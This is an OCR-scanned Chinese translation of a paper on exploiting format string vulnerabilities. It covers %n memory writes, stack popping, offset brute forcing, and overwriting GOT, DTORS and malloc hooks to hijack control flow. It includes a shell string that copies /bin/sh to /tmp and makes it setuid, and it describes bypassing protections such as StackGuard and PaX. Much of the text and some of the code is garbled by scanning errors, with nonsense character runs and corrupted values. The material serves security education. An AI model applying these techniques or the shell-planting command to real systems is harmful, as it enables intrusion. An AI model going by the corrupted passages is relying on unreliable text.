止 只 对 每 个 格式 化 字符 串 使 用 了 一 次 写 入 ， 但 是 他 可 以 在 一 个 格式 化 字符 串 内 执行 多 次 写 
A o 


15 


strcpy (canary, "AAAA"); 
printf ("%16u%n%16u%n%32u%n%64u%n", 1, (int *) &foo[O], 1, (int *) &foo[1], 1, (int *) 
&foo[2], 1, (int *) &foo[3]); 


printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); 
printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]); 


我 们 使 用 参数 1 作为 wu 填充 的 伪造 参数 。 同 样 ， 填 充 发 生 了 改变 ， 因 为 字符 数量 在 我 们 写 
入 32 的 时 候 已 经 是 16 了 。 所 以 我 们 只 需要 添加 16 个 字符 ， 而 不 是 32 个 ， 来 获取 我 们 想 
要 的 结果 。 


这 是 个 特殊 案例 ， 其 中 所 有 字 节 在 写 入 过 程 中 递增 。 但 是 通过 一 个 微小 的 修改 ， 我 们 也 可 以 
写 入 80 40 2010 。 由 于 我 们 写 入 整数 并 且 顺 序 是 小 端的 ， 在 写 入 过 程 中 只 有 最 低地 址 字 节 是 
重要 的 。 通 过 使 用 gx89 0x140 0x220 0x310 的 计数 器 ， 我 们 就 可 以 构造 预期 的 字符 串 。 计 算 写 
入 字符 预期 数量 的 计数 器 的 代码 是 这 个 : 


write_byte += 0x100; 

already_written %= 0x100; 

padding = (write_byte - already_written) % 0x100; 
if (padding < 10) padding += 0x100; 


其 中 write byte 是 我 们 想 要 创建 的 字 节 ， already_written 是 当前 写 入 数量 ， 由 格式 化 函数 
维护 ， padding 是 我 们 已 经 使 计数 器 增加 的 字 节 数 ， 例 如 : 


write_byte = 0x/7f; 
already_written = 30; 


write_byte += 0x100; /* write_byte is 0x17f now */ 
already_written %= 0x100; /* already_written is 30 */ 


/* afterwards padding is 97 (= 0x61) */ 


padding = (write_byte - already_written) % 0x100; 
if (padding < 10) padding += 0x100; 


现在 格式 化 字符 串 %97u 会 增加 %n TRA d 使 最 低地 址 字 节 等 于 write_byte ° KERETE 
充 是 否 低 于 10， 这 非常 需要 注意 。 一 个 简单 的 整数 输出 ， 例 如 wu 最 多 可 以 生成 十 个 字符 的 
字符 串 ， 取 决 于 所 输出 的 整数 值 。 如 果 所 需 长 度 大 于 我 们 指定 的 填充 ， 假 如 我 们 想 要 使 

用 %2u 输出 19000 ， 我 们 的 值 就 会 丢弃 ， 以 便 不 会 丢失 任何 有 意义 的 输出 。 通 过 确保 我 们 的 
填充 永远 大 于 10° 我 们 可 以 使 already_written 的 数值 永远 保持 精确 它 是 格式 化 函数 维护 
的 计数 器 ， 由 于 我 们 总 是 使 用 格式 化 参数 中 的 长 度 选项 ， 写 入 大 量 的 输出 ， 就 像 我 们 指定 的 
那样 。 


这 取决 于 格式 化 函数 所 运行 的 操作 系统 的 默认 字 长 ， 我 们 假设 这 里 是 基于 ILP32 的 架 
构 。 


在 实践 过 程 中 ， 为 了 利用 这 种 漏洞 ， 唯 一 剩 下 的 事情 就 是 将 参数 以 正确 的 顺序 放 到 栈 上 ， 并 
且 使 用 栈 的 POP 序列 来 增加 栈 指针 。 它 看 起 来 像 : 


A 
<stackpop><dummy-addr-pair * 4><write-code> 


译 者 注 : 我 更 推荐 把 dummy -addr-pair 放 在 stackpop ay ? 这 样 偏 移 数量 更 
小 ， stackpop 长 度 更 短 ， 而 且 stackpop 的 长 度 就 不 会 影响 偏 移 ， 也 不 需要 对 齐 。 


@ stackpop : 栈 的 POP 序列 ， 它 会 弹出 参数 ， 增 加 栈 指针 。 一 旦 开始 处 理 stackpop ， 格 
式 化 函数 的 内 部 栈 指针 就 会 指向 dummy-addr -pair 字符 串 


© dummy-addr-pair : 四 对 伪造 整数 值 ， 和 要 写 入 的 地 址 。 每 一 对 中 ， 地址 逐个 递增 ， 伪 造 
的 整数 可 以 是 不 含 空 字符 任何 东西 。 


è write-code : 格式 化 字符 串 实际 写 入 内 存 的 部 分 ， 通 过 使 用 %{n}u%N 偶 对 ， 其 中 {n} 大 
于 10。 第 一 个 部 分 用 于 增加 或 溢出 格式 化 函数 内 部 字 节 写 入 计数 器 的 最 低地 址 字 
Po yn 用 于 将 这 一 数值 写 入 dummy-addr-pair 部 分 中 的 地 址 。 

write-code 需要 修改 来 匹配 由 stackpop 写 入 的 字 节 数 ， 因 为 当 格 式 化 函数 解 


析 write-code 的 时 候 ， stackpop 已 经 向 输出 写 入 了 一 些 字符 -- 格式 化 函数 的 计数 器 已 经 不 
是 从 零 开 始 了 ， 并 且 这 个 应 该 考虑 到 。 


我 们 所 写 入 的 地 址 叫做 返回 地 址 位 置 ， 简 写 为 retloc ， 我 们 使 用 格式 化 字符 串 在 此 处 创建 的 
地 址 叫做 返回 地 址 ， 简 写 为 retaddr ° 


四 、 利 用 的 变 体 


漏洞 利用 是 一 门 艺 术 。 就 像 任何 艺术 一 样 ， 有 不 止 一 种 完成 事情 的 方式 。 通 常 你 并 不 想 走 别 
人 已 经 走 过 的 路 来 利用 东西 ， 而 是 利用 你 的 目标 环境 、 经 验 、 发 现 和 使 用 程序 中 现存 的 行 
为 。 这 个 额外 的 努力 可 以 在 很 多 东西 中 得 到 回报 ， 首 先 就 是 你 的 利用 的 可 算 性 和 健壮 性 。 或 
者 如 果 漏 洞 仅仅 影响 一 个 平台 或 系统 ， 你 可 以 利用 特殊 的 系统 特征 ， 来 寻找 利用 的 捷径 。 有 
很 多 东西 可 以 使 用 ， 这 仅仅 是 常见 技巧 的 一 个 基本 概览 。 


4.1 短 整 形 写 


我 们 不 需要 写 入 四 次 ， 而 是 可 能 使 用 两 次 写 入 操作 来 覆盖 一 个 地 址 。 这 可 以 通过 通常 的 xn HR 
作 以 及 带 有 较 大 n 值 的 wnu 字符 串 。 但 是 对 于 这 个 特殊 案例 来 说 ， 我 们 可 以 利用 特殊 的 写 操 
作 ， 它 可 以 写 入 短 整 形 类 型 : whn 参数 。 这 里 的 h 可 以 用 于 其 他 格式 化 参数 ， 来 将 栈 上 提供 
的 值 转 为 短 整 形 。 短 整形 写 入 技巧 比 第 一 种 技巧 有 一 个 优点 ， 它 不 会 地 址 旁边 的 数据 ， 所 以 
如 果 在 你 覆盖 的 地 址 后 面 有 珍贵 的 数据 ， 例 如 函数 和 参数， 它 就 会 保留 下 来 。 


但 是 通常 你 应 该 避免 它 ， 虽 然 多 数 C 标准 库 支持 它 ， 但 是 它 也 取决 于 格式 化 函数 的 行为 ， 也 
就 是 ， 如 果 写 入 字符 数 的 内 部 计数 器 可 以 突破 缓冲 区 边界 的 话 。 这 在 就 得 GNU C È (libc5) 
中 无 效 。 同 样 ， 它 在 目标 进程 中 会 消耗 更 多 内 存 。 


printf ("%.29010u%hn%.32010u%hn", 
1, (short int *) &foo[0], 
1, (short int *) &foo[2]); 


这 对 于 基于 RISC 的 系统 尤其 有 用 ， ee %n 指令 拥有 对 齐 限 制 。 通 过 使 用 h 修饰 符 ， 对 齐 
在 软件 中 被 计算 ， 或 者 是 用 特殊 的 机 器 指令 ， 你 通常 可 以 在 每 两 个 字 节 边界 上 写 入 。 


除 此 之 外 ， 它 的 工作 原理 就 像 四 字 节 的 技巧 那样 。 一 些 人 其 至 说 ， 可 以 只 用 一 步 就 完成 写 

入 ， 通 过 使 用 特别 大 的 填充 ， 例 如 %.3221219073u 。 但 是 实践 证 明 这 在 多 数 系统 上 都 不 管用 。 
这 个 话题 的 深入 分 析 最 早出 现在 portal 的 站 点 上 [3]。 一 些 其 他 的 不 错 注 解 可 以 在 HERT 文章 

[4] 的 早期 发 布 版 中 找到 。 


4.2 栈 的 弹出 


如 果 格 式 化 字符 串 太 短 而 不 能 提供 栈 的 弹出 序列 ， 它 无 法 到 达 你 的 字符 串 ， 这 怎么 办 ?到 你 
的 格式 化 字符 串 的 实际 距离 ， 以 及 格式 化 字符 串 的 大 小 之 间 会 有 一 个 竞争 ， 其 中 你 需要 至 少 
弹出 实际 距离 。 所 以 我 们 就 需要 一 个 有 效 的 方式 来 使 用 尽 可 能 少 的 字 节 增加 栈 指 针 。 


当前 我 们 仅仅 使 用 了 wu 序列 ， 来 展示 原理 ， 但 是 有 更 加 高 效 的 方式 。 mu 序列 有 两 个 字 节 
长 ， 但 是 弹出 了 四 个 字 节 ， 比 率 为 1:2 (我 们 贡献 了 1 个 字 节 ， 让 它 前 进 了 两 个 字 节 ) 。 


虽然 使 用 wf 参数 ， 我 们 就 能 让 其 前 进 八 个 字 节 ， 这 仅仅 贡献 了 两 个 字 节 。 但 是 这 有 个 很 大 的 
缺陷 ， 由 于 如 果 栈 上 的 垃圾 打印 为 浮 点 数 ， 可 能 就 有 除 零 错误 ， 会 使 成 哥 进 程 崩溃 。 为 了 避 

免 它 ， 我 们 可 以 使 用 特殊 格式 修饰 符 ， 它 只 会 打印 浮 点 数 的 整数 部 分 : %.f 会 向 上 遍历 堆栈 

的 和 八 个 字 节 ， 仅 仅 在 缓冲 区 中 占用 三 个 字 节 。 


在 BSD 衍生 系统 以 及 IRIX 中 ， 可 以 使 用 * 修饰 符 来 满足 我 们 的 需要 。 它 用 于 动态 提供 格式 
化 参数 生成 输出 的 长 度 。 虽 然 vod 打印 十 个 字符 wd 动态 获取 输出 长 度 : 下 一 个 栈 上 的 
格式 化 参数 提供 了 他 。 因 为 上 面 提 到 的 LIBC 允许 类 型 为 wx***x*xd 的 参数 ， 我 们 可 以 从 每 
个 * 拉 取 四 个 字 节 ， 这 相当 于 4:1 的 比例 。 这 就 产生 了 另 一 个 问题 : 多 数 情况 下 我 们 不 能 预 
测 输 出 长 度 ， 因 为 它 从 栈 上 动态 设置 。 


但 是 我 们 可 以 通过 再 所 有 型 号 的 后 面 插入 一 个 硬 编码 的 值 ， REEMA 
义 ， %*******x*16d 会 始终 打印 10 个 字 节 ， 无 论 从 堆栈 上 取出 了 什么 。 这 个 技巧 由 lorian 发 
现 。 


4.3 直接 参数 访问 


除了 改进 栈 弹 出 方式 ， 有 一 个 巨大 简化 方式 ， 它 被 称 为 "直接 参数 访问 "， 一 种 直接 从 格式 化 字 
符 串 对 栈 寻 址 的 方式 。 几 乎 所 有 现 有 的 C 标准 库 都 支持 这 个 特性 ， 但 是 并 不 所 有 都 能 够 将 这 
个 方式 应 用 于 格式 化 字符 串 利用 上 。 


译 者 注 : MSVC 不 支持 这 个 特性 。 
直接 参数 访问 由 8 修饰 符 控制 : 


printf ("%6$d\n", 6, 5, 4, 3, 2, 1); 


这 会 打印 1 > AA 6$ 显 式 寻 址 了 栈 上 的 第 六 个 参数 。 使 用 这 种 方式 ， 整 个 栈 弹出 序列 就 可 
以 扔 掉 了 。 


char foo[4]; 

printf ("%1$16u%2$n" 
"%1$16uU%3$n" 
"%1$32uU%4$n" 
"%1$64uU%5$n", 


(int *) &foo[0], (int *) &foo[1], 
(int *) &foo[2], (int *) &foo[3]); 


这 会 在 foo 中 创建 \x10\x20\x40\x80 。 这 个 直接 访问 在 BSD 机 器 衍生 系统 中 仅仅 限制 于 前 
和 八 个 参数 ， 除 了 IRIX ° Solaris 的 C 标准 库 将 其 限制 在 前 三 十 个 参数 ， 就 像 在 portal 的 文章 中 
那样 。 如 果 你 选择 了 负 的 或 者 巨大 的 值 ， 打 算 访 问 低 于 当前 位 置 的 栈 参 数 ， 它 不 会 产生 预期 
结果 而 是 崩溃 。 


虽然 它 极 大 简化 了 利用 ， 你 应 该 尽 可 能 使 用 栈 弹 出 技巧 ， 因 为 它 使 你 的 利用 可 以 一 直 。 如 果 
你 想 要 利用 的 漏洞 仅 存 于 一 个 平台 上 ， 它 允许 这 种 方式 ， 你 当然 可 以 利用 它 (例如 上 LSD 的 
IRIX telnet 守护 进程 利用 [21]) 。 


五 、 爆 破 


当 利 用 这 种 漏洞 ， 例 如 缓冲 区 溢出 或 者 格式 化 字符 串 漏 洞 时 ， 它 通常 会 失败 ， 因 为 没有 当心 
最 后 的 障碍 : 将 所 有 偏 移 再 正确 。 基 本 上 ， 寻 找 正 确 的 偏 移 意味 着 “将 什么 写 到 哪里 ”。 对 于 简 
单 的 漏洞 ， 你 可 以 可 靠 地 猜测 正确 偏 移 ， 或 者 爆破 它 ， 通 过 一 个 一 个 尝试 它们 。 但 是 一 旦 你 
需要 多 个 偏 移 ， 这 个 问题 就 指数 增长 ， 它 变 得 不 可 能 爆破 。 


在 格式 化 字符 串 中 ， 只 有 你 在 利用 守护 进程 ， 或 任何 只 给 你 一 次 尝试 机 会 的 程序 时 ， 这 个 问 
题 才 会 出 现 。 一 旦 你 拥有 多 ee 你 就 可 以 观察 格式 化 字符 串 的 响应 ， 虽 然 不 足以 发 
现 所 有 必要 的 偏 移 。 


可 能 的 ， SE ， 我 们 已 经 可 以 有 限 控 制 目标 进程 : 我 们 的 格式 化 字 
已 经 告诉 了 远程 进程 要 做 什么 ， ee 能 够 窥探 内 存 ， pote saa ae o 


因为 这 里 解释 的 两 种 方式 差异 很 大 ， 它 们 会 单独 解释 。 


1 基于 响应 的 爆破 


tf8 在 最 流行 的 格式 化 字符 串 利 用 (wu-ftpd 2.6.0) 中 观察 并 利用 了 打印 出 来 的 格式 化 回应 。 
它 使 用 这 个 回应 来 判断 距离 。 


我 和 smiler 深入 发 展 了 这 个 技巧 ， 来 判断 两 个 其 它 地 址 ， 也 就 是 返回 地 址 retaddr 和 返回 地 
址 位 置 retloc ， 并 使 用 它 来 构建 完整 的 偏 移 独立 的 wu-ftpd 利用 程序 (7350wu [22]) ° 


为 了 爆破 这 个 距离 ， 你 应 该 像 这 样 使 用 格式 化 字符 串 。 
"AAAABBBB | stackpop |%08x |" 


stackpop 取决 于 我 们 打算 猜测 的 距离 。 距 离 在 每 次 尝试 中 都 会 增加 : 


while (distance > 0) 
strcat (stackpop, "%u"); 
distance -= 4; 


如 果 我 们 探测 距离 32， 格 式 化 字符 串 为 : 


"AAAABBBB | %u%u%u%u%u%u%u%u |%08x |" 


我 们 从 栈 上 弹出 了 32 个 字 节 (8 个 wu ) ， 并 以 十 六 进 制 ， 打 印 了 第 32 字 节 位 置 的 四 个 字 
节 。 理 想 情 况 下 的 输出 为 : 


AAAABBBB | 98321793817 7639561760134608728913021 | 414141411 | 


41414141 是 AAAA 是 十 六 进 制 形式 ， 我 们 越过 了 整 好 32 字 节 的 距离 。 如 果 你 不 能 通过 增加 上 距 
离 到 达 该 模式 串 ， 这 有 两 个 原因 : 一 是 距离 太 大 无 法 到 达 ， 例 如 如 果 格 式 化 字符 串 位 于 堆 
上 ， 二 是 不 是 以 四 字 节 对 齐 。 在 后 者 的 情况 中 ， 我 们 仅仅 需要 在 格式 化 字符 串 前 面 插入 一 个 
到 三 个 伪造 字 节 。 之 后 我 们 可 以 滑动 字符 串 的 位 置 ， 以 便 模 式 串 42414141 变 为 正确 的 模式 


® 41414141 ° 


一 旦 你 设置 了 对 齐 和 距离 ， 你 就 可 以 爆破 格式 化 字符 串 的 缓冲 区 地 址 了 。 因 此 你 使 用 这 样 的 
格式 化 字符 串 : 


addr | stackpop| %%|%s | 





格式 化 字符 串 从 左 到 右 处 理 ，addr 和 序列 没有 任何 害处 。 stackpop 将 栈 指 针 向 上 移 
动 ， 直 到 它 指向 addr 地 址 。 最 后 %s 打印 出 addr 处 的 ASCIIZ 字符 串 。 


在 理想 情况 下 ， addr 会 指向 我 们 格式 化 字符 串 的 “序列 。 这 里 输出 为 : 





garbage | % | %% |%s | | 


其 中 garbage 由 addr 和 stackpop 输出 组 成 之 后 处 理 的 %% 字符 串 会 转换 为 时 07 
为 %x 被 格式 化 字符 处 理 器 转换 为 %。 之 后 字符 串 %%|%s| 被 插入 ， 因 为 我 们 提供 的 格 
式 化 字符 串 的 ws 被 处 理 。 要 注意 在 我 们 尝试 处 理 不 同 的 addr fi? a eatin 
值 。 在 我 们 的 理想 情况 下 ， 我 们 让 addr 直接 指向 我 们 的 缓冲 区 。 你 可 以 看 到 ， 通 过 观 

FR ym ， 我 们 可 以 分 辨 出 指向 我 们 的 格式 化 字符 串 的 地 址 〈 带 有 两 个 % 字符 ) ， 以 及 偶然 指 
向 目标 缓冲 区 (只 有 一 个 % 字符 ， 由 于 被 格式 化 函数 转 义 ) 的 指针 。 








如 果 addr 指向 了 目标 缓冲 区 ， 输 出 为 : 


garbage | % | %| | 





你 可 以 看 到 ， 只 有 一 个 % 字符 。 这 让 我 们 能 够 精确 预测 目标 缓冲 区 ， 对 于 格式 化 字符 串 在 堆 
中 的 情况 ， 这 会 非常 有 用 。 


由 于 我 们 知道 了 ， 我 们 的 %s 相对 于 格式 化 字符 串 的 起 始 位 于 哪里 ， 并 且 我 们 拥有 了 指向 缓冲 
区 的 地 址 ， 我 们 就 可 以 将 地 址 重 定向 ， 以 便 精 确 了 解 我 们 的 格式 化 字符 串 在 哪里 开始 。 由 于 
你 通常 希望 将 shellcode 放 在 格式 化 字符 串 中 ， 你 可 以 准确 计算 出 相对 于 格式 化 字符 串 地 址 
的 retaddr ° 


A Ra 


育 爆 破 不 像 基 于 响应 的 爆破 那样 直接 。 基 本 的 理念 是 ， 我 们 可 以 测量 出 远程 计算 机 处 理 格 式 
化 字符 串 的 所 需 时 间 。 类 似 %.9999999u 比 简单 的 wu 花费 的 时 间 要 长 。 同 样 ， 通 过 在 未 映射 
的 地 址 上 使 用 wm ， 我 们 可 以 可 靠 地 产生 段 错 误 。 


此 类 爆破 的 这 一 基本 的 方式 由 tf8 发 明 ， 之 后 由 我 改进 来 爆破 缓冲 区 地 址 。 


由 于 这 个 工具 相对 复杂 ， 并 且 仅 仅 可 用 于 特殊 的 场景 ， 我 在 example/ 目录 下 提供 了 可 用 的 示 
例 。 如 果 你 可 以 多 次 触发 案例 ， 但 是 不 能 查看 格式 化 函数 的 响应 ， 例 如 在 syslogs 服务 中 ， 
这 是 个 有 意思 的 东西 。 


如 果 你 对 这 个 技巧 感 兴趣 ， 请 参见 源码 ， 我 在 此 处 就 不 描述 了 。 


、 特 殊 和 案例 


oe ee ee ， 不 需要 了 解 所 有 偏 移 ， 或 者 你 可 以 使 利用 更 加 简单 ， 直 接 ， 最 
重要 的 是 : 可 靠 。 这 里 我 列 出 了 一 些 利 用 格式 化 字符 串 漏洞 的 常见 方法 。 


6.1 替代 目标 


受 基 于 栈 的 缓冲 区 溢出 的 较 长 历史 的 影响 ， 很 多 人 认为 ， 禾 盖 栈 上 的 返回 地 址 是 控制 进程 的 
唯一 方式 。 但 是 如 果 我 们 利 Paes ， 我 们 不 能 准确 知道 我 们 的 缓冲 区 在 哪里 ， 
并 且 我 们 可 以 覆盖 另外 一 些 东西 。 常 见 的 基于 栈 的 缓冲 区 溢出 只 能 履 盖 返回 地 址 ， 因 为 它们 
也 存储 在 栈 上 。 See 我 们 可 以 覆盖 内 存 中 的 任意 地 址 ， 让 我 们 能 够 修改 整 
个 可 写 入 的 进程 空间 。 


因此 ， 检 验 其 它 部 分 或 完全 控制 被 利用 程序 的 方式 ， 就 很 有 意思 了 。 在 特定 场景 下 ， 这 可 以 
产生 一 种 更 简单 的 利用 方式 我们 之 前 看 到 - 或 者 可 以 用 于 统 过 特定 的 保护 。 


我 会 在 这 里 简单 讨论 一 下 替代 的 地 址 ， 并 给 出 更 深入 的 文章 的 引用 。 


6.1.1 GOT & ž 


任何 ELF 二 进 制 [12] 的 进程 空间 都 包含 一 个 特殊 区 段 ， 叫 做 "全 局 偏 移 表 ” (GOT) 。 每 个 程 
序 使 用 的 库 函 数 都 在 这 里 拥有 一 个 条 目 ， 它 包含 一 个 真实 函 数 的 地 址 。 这 样 是 为 了 允许 库 在 
进程 内 存 中 简单 地 重 定 向 ， 而 不 是 使 用 硬 编码 的 地 址 。 在 程序 首次 使 用 函数 之 前 ， 条 目 包 含 
运行 时 链接 器 (RTL) 的 地 址 。 如 果 函 数 被 程序 调用 ， 控 制 流 就 传递 给 了 RTL， 并 且 函 数 的 
KE ODE AK ABT HAG AS] GOT。 该 函数 的 每 个 调用 都 将 控制 流 直接 传递 给 它 自己 ，RTL 不 再 
为 该 函数 调用 了 。 对 于 GOT 利用 的 更 加 全 面 的 概览 ， 请 参考 Lam3rZ 兄弟 的 不 错 的 文章 
[19] ° 


mi RSM EAE A BAR GOT 条 目 ， 我 们 就 可 以 利用 格式 化 字符 串 漏 洞 ， 获 取 控 制 
权 ， 并 跳 到 任何 可 执行 的 地 址 。 不 幸 的 是 ， 这 意味 着 任何 基于 栈 的 保护 都 会 失效 ， 它 们 检查 
了 返回 地 址 。 


RMA Žž GOT AA PR ea ee 势 ， hee 它 独立 于 环境 变量 (例如 栈 ) ， 以 及 动态 内 存 
分 配 CE) 。GOT 条 目的 地 址 在 每 个 二 进 制 中 是 固定 的 ， 所 以 如 果 两 个 系统 运行 了 相同 的 二 
进 制 ，GOT 条 目 始终 是 同一 地 址 。 


你 可 以 通过 执行 这 个 命令 ， 看 到 GOT 条 目 位 于 函数 的 哪里 : 


objdump --dynamic-reloc binary 


we HA (RA RTL 链接 函数 ) 的 地 址 直接 就 是 打印 出 的 地 址 。 


另 一 个 非常 重要 的 因素 ， 为 什么 使 用 GOT 条 目 来 获取 控制 权 ， 而 不 是 返回 地 址 ， 是 代码 的 形 
A (在 一 些 “ 安 全 "指纹 守护 程序 中 发 现 ) 


syslog (LOG_NOTICE, user); 
exit (EXIT_FAILURE) ; 


A PRT RM EARTH o KT ERA o TAARA k syslog 自己 的 返回 地 
址 ， 但 是 更 加 可 靠 的 方式 就 是 履 盖 exit 函数 的 GOT 条 目 ， 它 会 将 执行 流传 递 给 你 指定 的 地 
址 ， 只 要 exit 被 调用 。 


译 者 注 : 动态 链接 时 ， 程 序 会 调用 libe 中 的 系统 调用 的 封装 。 其 它 系统 调用 同 理 。 
但 是 GOT 技巧 的 最 实用 的 优点 ， 就 是 它 易 于 使 用 ， 你 只 需要 运行 opjdump ， 就 能 得 到 要 履 盖 
的 地 址 ( retloc ) 。 黑 客 们 都 懒得 打字 (除了 粗心 ) 。 


6.1.2 DTORS 


实用 GCC 编译 的 二 进 制 包含 一 个 特殊 的 析 构 器 表 区 段 ， 叫 做 DToRS o HALA exit 系统 调 
用 触发 之 前 ， 在 所 有 的 常见 清理 操作 完成 之 后 ， 这 里 列 出 的 析 构 器 会 调用 。 pToRs 区 段 为 以 
下 格式 : 


DTORS: QOxffffffff 0x00000000 ... 


其 中 第 一 项 是 一 个 计数 器 ， 它 保存 了 下 面 函 数 指针 的 数量 ， 如 果 列 表 为 空 则 为 负 一 (就 像 这 
里 ) 。 在 所 有 DTORS 区 段 的 实现 中 ， 这 人 0 eee ad ie 之后， 在 相对 偏 移 +4 的 位 
置 ， 就 是 清理 函数 的 地 址 ， 以 NULL 地 址 终止 。 你 可 以 仅仅 将 这 个 NULL HH BSA RH 
shellcode 指针 ， 并 且 你 的 shellcode 就 会 在 程序 退出 时 执行 。 nae eee 9 介绍 可 以 
在 [17] 找到 。 


6.1.3 C 标准 库 的 钩子 


几 个 月 之 前 ，Splar Designer 介绍 了 一 种 新 MARA RAA malloc 分 配 的 内 存 中 基于 堆 的 洪 


出 。 它 提倡 覆盖 GNU C 库 以 及 其 他 库 中 的 钧 子 。 通 常 ， 这 个 钧 子 有 内 存 调 试 和 性 能 工具 使 
用 ， 在 应 用 使 用 malloc 接口 分 配 或 释放 内 存 时 获取 通知 。 有 一 些 钧 子 ， 但 是 最 常见 的 
Æ __malloc_hook ` _realloc hook 和 _free hook 。 通 常 它 们 设 为 NULL， 但 是 只 要 你 使 用 


指向 你 代码 的 指针 覆盖 了 它 ， 你 的 代码 就 会 在 malloc ` realloc 和 free 执行 时 调用 。 由 于 
钧 子 通 常用 作 调 试 工具 ， 它 们 在 丨 实 元 数 执行 之 前 调用 。 


关于 malloc 履 盖 技巧 的 讨论 在 Solar Designer 关于 Netspace JPEG 解码 器 漏洞 的 报告 中 提 
供 。 


6.1.4 ”atexit 结构 


几 个 月 之 前 ，Kalou 介绍 了 一 种 利用 Linux 下 静态 链接 二 进 制 的 方式 ， 它 利用 了 叫 

做 __atexit 的 通用 处 理 器 ， 只 要 你 的 程序 调用 了 exit ， 它 就 会 执行 Š 这 允许 程序 建立 很 多 
处 理 器 ， 它 们 会 在 退出 时 调用 来 释放 资源 。 _atexit 结构 上 的 攻击 的 详细 讨论 ， 可 以 在 
Pascal Bouchareines 的 文章 [16] 中 找到 。 


6.1.5 函数 指针 


如 果 漏 洞 应 用 使 用 了 函数 指针 ， 我 们 就 有 机 会 履 盖 它们 。 为 了 充分 利用 它们 ， 你 需要 履 盖 它 
并 且 之 后 触发 它们 。 一 些 守 护 程序 使 用 函数 指针 表 来 处 理 命令 ， 例 如 QPOP ° AM > HAG 
针 也 通常 用 于 模拟 类 似 _atexit 的 处 理 器 ， 例 如 SSHD © 


6.1.6 jmpbuf 


首先 ， jmpbuf A AATA TER BAA o RAAF AB > jmpbuf 的 行为 就 像 函 数 
指针 ， 因 为 我 们 可 以 禾 盖 内 存 的 任意 地 方 ， 不 仅 限 于 jmpbuf 到 我 们 的 缓冲 区 的 相对 位 置 。 深 
入 讨论 可 以 在 Shok 关于 堆 溢出 的 文章 中 发 现 。 


6.2 Return-to-libc 


你 可 以 使 用 常见 的 Return-to-libc 技巧 ， 同 样 是 由 Solar Designer 提出 的 [14]。 但 是 有 时 会 有 
捷径 ， 它 会 产生 更 简单 的 利用 。 

FILE * f; 

char foobuf[512]; 

snprintf (foobuf, sizeof (foobuf), user); 


foobuf[sizeof (foobuf) - 1] = ’\0’; 
f = fopen (foobuf, "r"); 


你 可 以 将 fopen 的 GOT 地 址 替换 为 system 的 函数 地 址 。 之 后 使 用 这 样 的 格式 化 字符 串 : 


"cd /tmp;cp /bin/sh .;chmod 4777 sh;exit;" "addresses|stackpop|write" 


ZL addresses 、 stackpop 和 write Æ% LIJ AIO BFA lo EIA FARA fopen 
GOT 条 目 RAA system 的 地 址 。 fopen 调用 的 时 候 字符 串 转 递 给 了 system 函数 。 或 者 你 
可 以 使 用 常用 的 旧 方 法， 向 上 面 描述 的 那样 。 


6.3 多 重 打 印 


如 果 你 可 以 在 相同 进程 中 多 次 触发 格式 化 字符 串 漏 洞 (就 像 wu-ftpd 那样 ) ， 你 就 可 以 不 仅仅 
禾 盖 返回 地 址 。 例 如 ， 你 可 以 将 整个 shellcode 储存 在 堆 上 来 绕 过 任何 不 可 执行 的 栈 保护 。 和 
其 它 这 里 解释 的 技巧 一 起 使 用 ， 你 就 可 以 绕 过 下 面 的 保护 措施 (显然 是 不 完全 的 ) 


e StackGuard 

e StackShield 

e Openwall 内 核 补 丁 (由 Solar Designer) 
e libsafe 


在 2000 年 十 月 中 匀 ， 一 群 人 发 布 了 一 系列 Linux 内 核 补丁 ， 叫 做 Pax [11]， 能 够 高 效 实现 可 
读 可 写 但 不 可 执行 的 页 面 。 由 于 它 不 炯 好 后 在 x86 CPU 系列 上 这 么 做 ， 这 个 补丁 用 了 一 些 技 
巧 ， 它 们 被 Plex CPU 模拟 器 项 目 所 发 明 。 在 运行 这 个 补丁 的 系统 中 ， 几 乎 不 可 能 执行 引入 该 
进程 的 任意 Shellcode。 但 是 多 数 情 况 下 ， 在 进程 空间 中 已 经 有 了 实用 的 代码 。 我 们 可 以 执行 
这 个 代码 来 做 通常 在 shellcode 中 所 做 的 事情 。 


使 用 通常 的 Return-to-libc 技巧 [14]， 你 可 以 绕 过 这 个 保护 。 最 简单 的 案例 就 是 返回 

到 system 库 函 数 ， 使 用 格式 化 字符 串 作 为 参数 。 

通过 稍微 优化 字符 串 ， 你 可 以 将 需要 了 解 的 强制 性 偏 移 减 为 一 个 : system 函数 地 址 。 为 了 调 
用 程序 ， 你 可 以 在 格式 化 字符 串 的 尾部 使 用 这 个 序列 : 


+ 


任何 指向 ; 字符 的 地 址 ， 传 递 给 system BAN > PAM TAPS > AA ; 字符 在 shell 的 命 
令 中 是 NOP 。 


6.4 堆 中 的 格式 化 字符 串 


到 现在 为 止 ， 我 们 假设 格式 化 字符 串 始 终 在 栈 上 “。 但 是 ， 有 些 情况 下 ， 它 储存 在 堆 上 。 如 果 
栈 上 有 另 一 个 我 们 可 以 影响 的 缕 冲 区 ， 我 们 就 可 以 使 用 它 来 提供 要 写 入 的 地 址 ， 但 是 如 果 没 
有 这 种 缓冲 区 ， 我 们 有 几 种 替代 方案 。 


如 果 目 标 缓冲 区 在 栈 上 ， 我 们 首先 可 以 打印 它 ， 之 后 使 用 那里 的 地 址 ， 来 使 用 wn 参数 写 入 : 


void func (char *user_at_heap) { 
char outbuf[512]; 
snprintf (outbut, sizeof (outbuf), user_at_heap); 
outbuf [sizeof (outbuf) - 1] = ’\0’; 
return; 


这 里 我 们 使 用 了 一 个 格式 化 字符 串 ， 它 包含 我 们 想 要 写 入 的 地 址 ， 像 通常 一 样 。 但 是 它 特别 
的 是 ， 我 们 不 能 从 格式 化 字符 串 本 身 来 访问 这 些 地 址 ， 而 是 通过 目标 缓冲 区 。 为 此 我 们 首先 
需要 在 栈 上 储存 地 址 ， 通 过 简单 打印 它们 。 因 此 写 入 的 序列 需要 在 格式 化 字符 串 的 地 址 后 
Wo 


如 果 两 个 缓冲 区 都 不 在 栈 上 ， 问 题 就 来 了 : 


void func (char *user_at_heap) { 
char * outbuf = calloc (1, 512); 
snprintf (outbut, 512, user_at_heap); 
outbuf [511] = ’\0’; 
return; 


现在 它 取决 于 我 们 是 否 可 能 在 栈 上 提供 数据 。 例 如 ， 一 些 wu-ftpd 的 利用 使 用 密码 字段 来 储存 
数据 (shellcode， 并 不 是 地 址 -- 这 些 利 用 程序 不 能 利用 非 匿名 的 账户 ) © 


